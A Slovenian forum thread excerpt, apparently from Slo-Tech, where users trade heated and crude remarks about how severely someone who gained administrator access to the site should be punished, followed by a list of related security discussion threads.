A se spomnete, kako ste se vsi jezili in bili sploh napihnjeni, ko je prisla novica o nameravanem hudem kaznovanju tiste najstnice okrog 10 let stare iz ZDA, ker si je drznila downloadad svojo najljubšo skladbo. Evo to vam je isto.
Tiste, ki bi pa radi, da se mu ne vem kaj o njegovem spolnem organu na hrbet napiše, bi pa najraje povabil v A kanal, da bi vam pred televizijskimi kamerami pokazali, kako to že počnejo v "tistih" državah (ja, obnašate se kot v otroštvu zlorabljene misice).
In višina kazni,... vdrl je u en slo-tech.... za božjo voljo,... V SLO-TECH!!!!!,.... najbolj da vsakega mulca, ki čokolado ukrade damo kr na grmado (da ne bo slučajno kdaj banke oropal).
A se spomnete, kako ste se vsi jezili in bili sploh napihnjeni, ko je prisla novica o nameravanem hudem kaznovanju tiste najstnice okrog 10 let stare iz ZDA, ker si je drznila downloadad svojo najljubšo skladbo. Evo to vam je isto.
Tiste, ki bi pa radi, da se mu ne vem kaj o njegovem spolnem organu na hrbet napiše, bi pa najraje povabil v A kanal, da bi vam pred televizijskimi kamerami pokazali, kako to že počnejo v "tistih" državah (ja, obnašate se kot v otroštvu zlorabljene misice).
In višina kazni,... vdrl je u en slo-tech.... za božjo voljo,... V SLO-TECH!!!!!,.... najbolj da vsakega mulca, ki čokolado ukrade damo kr na grmado (da ne bo slučajno kdaj banke oropal).
TekO ::
Pa ti si glup wakum p....! prebrau sm use in vem zakaj se gre, ok sm uporabu besedo "vdru" s tem sm mislu pač da je pršu notr z administratorskimi pravicami. In če sm zard tega glup pol pa ne vem.
Jao mi gre na žiwce tak folk.
Jao mi gre na žiwce tak folk.
Ideas are bulletproof.
Vredno ogleda ...
Tema | Ogledi | Zadnje sporočilo | |
---|---|---|---|
Tema | Ogledi | Zadnje sporočilo | |
» | Ajpes končno priznal: Ne vemo, kaj delamo (strani: 1 2 )Oddelek: Novice / Varnost | 32214 (22521) | Furbo |
» | Varnostna luknja v .MacOddelek: Novice / Varnost | 2724 (2722) | opeter |
» | Popustil najšibkejši člen Slo-Techa (strani: 1 2 3 4 )Oddelek: Novice / Varnost | 19213 (11869) | jype |
» | Varnost nekaterih spletnih trgovinOddelek: Omrežja in internet | 3072 (1992) | BigWhale |
» | Hekerji (strani: 1 2 3 )Oddelek: Programiranje | 13128 (4573) | darkolord |